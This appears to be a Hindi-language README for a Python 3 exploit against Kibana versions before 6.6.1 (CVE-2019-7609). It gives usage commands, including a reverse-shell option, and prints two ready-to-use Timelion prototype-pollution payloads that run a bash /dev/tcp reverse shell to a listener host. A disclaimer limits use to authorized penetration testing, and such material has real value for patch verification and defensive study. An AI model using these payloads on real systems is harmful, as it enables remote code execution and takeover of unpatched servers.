
Python 3 एक्सप्लॉइट Kibana < 6.6.1 RCE (CVE-2019-7609) के लिए, प्रोटोटाइप प्रदूषण के माध्यम से, स्वचालित संस्करण पहचान और वैकल्पिक रिवर्स शेल के साथ।
लेखक: LandGrey (Python3 Refactor by [Your Name])
संदर्भ: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ अस्वीकरण:
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। इसे उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक और योगदानकर्ता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
यह एक Python 3 एक्सप्लॉइट स्क्रिप्ट है जो Kibana संस्करणों < 6.6.1 में रिमोट कोड एक्सेक्यूशन भेद्यता के लिए है। यह एक प्रोटोटाइप प्रदूषण दोष का उपयोग करके मनमाने आदेशों को निष्पादित करता है, जिसमें एक कमजोर Kibana इंस्टेंस पर रिवर्स शेल उत्पन्न करना शामिल है।
python3 kibana_exploit.py -u http://target-kibana:5601
रिवर्स शेल ट्रिगर करने के लिए:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requests लाइब्रेरीpackaging लाइब्रेरीनिर्भरताएँ स्थापित करने के लिए:
pip install requests packaging
आप इस भेद्यता को Kibana के Timelion विज़ुअलाइज़र का उपयोग करके मैन्युअल रूप से भी शोषित कर सकते हैं:
securityMB द्वारा पेलोड:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
chybeta द्वारा पेलोड:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
192.168.1.100 और 4444 को अपने स्वयं के लिसनर आईपी और पोर्ट से बदलें।
स्क्रिप्ट पहचान, सत्यापन, और शोषण के लिए स्पष्ट, चरण-दर-चरण आउटपुट प्रदान करती है, जिससे इसका पालन करना आसान और उपयोग करना मज़ेदार हो जाता है!
यह स्क्रिप्ट प्रोटोटाइप प्रदूषण, रिमोट कोड एक्सेक्यूशन, और पेनिट्रेशन टेस्टिंग तकनीकों के बारे में सीखने का एक शानदार तरीका है। इसका जिम्मेदारी से और हमेशा अनुमति के साथ उपयोग करें!
यह प्रोजेक्ट केवल शैक्षिक उपयोग के लिए है। कोई वारंटी नहीं, कोई गारंटी नहीं। नैतिक रूप से हैक करें, जिज्ञासु रहें, और मज़े करें!